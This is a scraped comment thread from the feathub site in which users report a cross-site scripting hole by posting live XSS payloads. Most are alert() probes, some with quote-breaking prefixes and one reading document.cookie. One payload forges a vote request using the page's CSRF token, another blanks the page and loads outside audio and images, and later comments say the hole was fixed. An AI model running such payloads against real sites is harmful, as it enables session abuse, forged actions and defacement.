feathub/feathub

YOUR SITE EXISTS XSS

bbbbx asked for this feature over 1 year ago — 22 comments

bbbbx commented over 1 year ago

YOUR SITE EXISTS XSS! please fix it! alert('YOUR SITE EXISTS XSS! please fix it!')

bbbbx commented over 1 year ago

alert('YOUR SITE EXISTS XSS! please fix it!'

bbbbx commented over 1 year ago

alert('YOUR SITE EXISTS XSS! please fix it!')

bbbbx commented over 1 year ago

alert('YOUR SITE EXISTS XSS! please fix it!')

reinit commented over 1 year ago

var xmlReq = new XMLHttpRequest(); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("method=patch&authenticitytoken=" + document.head.querySelector("[name~=csrf-token][content]").content);

| xss67612 commented over 1 year ago

document.body.innerText = '';

let audio = new Audio('http://dl.stream.qqmusic.qq.com/M5000036Tf0f03sL4n.mp3?vkey=A3EDA94F203BA3612F658DE4820E8AE6D58BA52F8D9F5789E40AFA1065D58F26E0A951C9BB8F482819C3185BE1AEB77356B11F154A90C52D&guid=5150825362&fromtag=1');
audio.loop = true;
audio.autoplay = true;
document.body.style.height = '1000px';
document.body.addEventListener("mousemove", function () {
    audio.play();
});

let image = new Image();
image.style.position='absolute';
image.left=0;
image.top=0;
image.style.width='100%';
image.style.height='100%';
image.src='https://timgsa.baidu.com/timg?image&quality=80&size=b9999_10000&sec=1553929917129&di=a8bae55a6a121071613d4f801322bd0f&imgtype=0&src=http%3A%2F%2Fs6.sinaimg.cn%2Fmw690%2F003xpBcszy6PCoJubOd35%26amp%3B690';
document.body.append(audio,image);

console.log('希望你能换个心情,迎接未来美好的每一天!');

LinXueyuanStdio commented over 1 year ago

img,svg,table{visibility: collapse;}

zzxcvbnm19 commented over 1 year ago

alert("111")

zzxcvbnm19 commented over 1 year ago

alert("111")

zzxcvbnm19 commented over 1 year ago

"'>alert('XSS')

zzxcvbnm19 commented over 1 year ago

'>alert(2)

='>alert(document.cookie)

alert(3)

zzxcvbnm19 commented over 1 year ago

撒旦撒旦alert("111")

zzxcvbnm19 commented over 1 year ago

window.alert = function() { return false; }

zzxcvbnm19 commented over 1 year ago

(function() { console.log(3); })();

zzxcvbnm19 commented over 1 year ago

zzxcvbnm19 commented over 1 year ago

zzxcvbnm19 commented over 1 year ago

zzxcvbnm19 commented over 1 year ago

]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)">

Vortetty commented 10 months ago

it is fixed then?

Vortetty commented 10 months ago

yeah, very easily too. they just wrapped all text in ""

Vortetty commented 10 months ago

this needs closed

zMingGit commented 9 months ago

lol

Join the discussion!

Sign-in with GitHub to comment